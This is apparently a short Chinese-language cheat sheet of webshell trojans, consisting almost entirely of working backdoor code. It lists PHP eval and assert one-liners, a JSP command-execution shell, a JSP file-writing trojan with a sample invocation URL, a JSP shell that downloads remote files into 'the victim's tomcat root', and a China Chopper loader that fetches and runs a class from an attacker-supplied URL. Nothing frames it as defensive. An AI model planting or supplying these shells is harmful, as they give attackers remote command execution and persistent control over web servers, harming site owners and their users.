<?php @eval(@$_POST[cmd]); ?>
<?php @assert($_POST['cmd']); ?>
jsp
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
写入文件木马
<%
if(request.getParameter("f")!=null)(new
java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(
request.getParameter("t").getBytes());
%>
调用木马的方法:http://ip/shell2.jsp?f=1.txt&t=hello%20kitty
远程文件下载并写入
<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
int a = -1;
while ((a = in.read(b)) != -1) {
baos.write(b, 0, a);
}
new java.io.FileOutputStream(application.getRealPath("\\")+"\\"+
request.getParameter("f")).write(baos.toByteArray());
%>
从百度网站远程下载, 放入 受害者的 tomcat 根目录下
http://ip:port/shell3.jsp?f=3.png&u=http://www.baidu.com/img/bdlogo.png
菜刀木马
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new
java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new
Object[]{request.getParameterMap()})%>
网友评论